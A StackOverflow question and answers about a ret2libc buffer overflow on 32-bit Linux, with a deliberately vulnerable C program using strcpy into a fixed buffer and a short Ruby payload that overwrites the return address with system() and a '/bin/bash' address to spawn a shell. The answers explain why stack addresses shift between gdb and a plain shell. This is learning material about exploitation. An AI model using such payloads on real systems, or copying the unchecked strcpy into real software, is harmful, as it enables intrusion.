Ret2libc exploit works in gdb, but in normal shell gives error sh: 1: g:0:1: not found

StackOverflow https://stackoverflow.com/questions/17266787

  •  01-06-2022

Question

I am learning about ret2libc buffer overflow exploits to bypass NX.

My vulnerable code (vuln.c):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[512];

    if (argc != 2)
        printf("NO\n");
    else {
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    }
}

Compiled with this command: # gcc -o vuln vuln.c

I then created this simple ret2libc exploit in ruby (exploit.rb):

p = "A"*524                   # pad past the 512-byte buffer up to the saved return address
p += [0xb7e9ef10].pack('V')   # system()   ('V' = 32-bit little-endian unsigned; '<I' is not a valid Ruby pack directive)
p += [0xb7e79e46].pack('V')   # normal ret val
p += [0xbffff75a].pack('V')   # "/bin/bash"
print(p)

If I run it in gdb with (gdb) r $(ruby exploit.rb), it gives me a nice bash shell.

I then try to run it in a normal shell with # ./vuln $(ruby exploit.rb), but instead of giving me a shell it gives me this: sh: 1: g:0:1: not found

ASLR is disabled and the only protection enabled is NX, I think.

Any help is appreciated.

Edit:

I am running this on i686 in case that helps.


Solution

The reason for the shift is the execution environment.

user@feynman:~$ ./getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff82
user@feynman:~$ /home/user/getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff70

Here the way of launching getenv affects the address of PWN.
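The answer's getenv helper is not shown. The following is an added example in the same spirit (not the answerer's code; the program name envaddr and the variable name PWN are assumptions): it prints the real in-stack address of an environment variable next to argv[0], so the shift between launching as ./vuln and as a full path can be observed directly instead of guessed.

```c
/* Added example (not from the question or answers): print where an
 * environment variable's string actually lives in the process's stack,
 * next to argv[0].  The kernel copies the executable path to the very top
 * of the stack, then the environment strings, then the argv strings, so a
 * longer launch path (or a changed environment) moves all of them. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

extern char **environ;

/* Return a pointer to the value part of "NAME=value" inside the process's
 * own environ block, or NULL when NAME is not set.  This is the real
 * in-memory address of the string, which is what an address comparison
 * between two runs needs; a plain prefix match is rejected ("PW" != "PWN"). */
const char *env_value_ptr(const char *name)
{
    size_t n = strlen(name);
    for (char **e = environ; e && *e; e++) {
        if (strncmp(*e, name, n) == 0 && (*e)[n] == '=')
            return *e + n + 1;
    }
    return NULL;
}

/* Byte distance between two addresses (hi - lo). */
long addr_delta(const void *hi, const void *lo)
{
    return (long)((const char *)hi - (const char *)lo);
}

int main(int argc, char *argv[])
{
    const char *name = argc > 1 ? argv[1] : "PWN";   /* variable to look up */
    const char *val = env_value_ptr(name);

    printf("argv[0] (\"%s\") is at %p\n", argv[0], (void *)argv[0]);
    if (!val) {
        printf("%s is not set\n", name);
        return 1;
    }
    printf("%s (\"%s\") is at %p, %ld bytes above argv[0]\n",
           name, val, (const void *)val, addr_delta(val, argv[0]));
    /* Run it twice, e.g. as ./envaddr PWN and as "$PWD"/envaddr PWN, with
     * ASLR disabled: the printed addresses move, which is the shift the
     * accepted answer describes and the reason a gdb address is not
     * portable to a plain shell launch. */
    return 0;
}
```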

Other tips

You achieved code execution but the address of the SHELL env var is off. Try [address of shell in gdb] + 4, or in gdb, x/s 0xbffff75a+4.

Licensed under: CC-BY-SA with attribution
Not affiliated with StackOverflow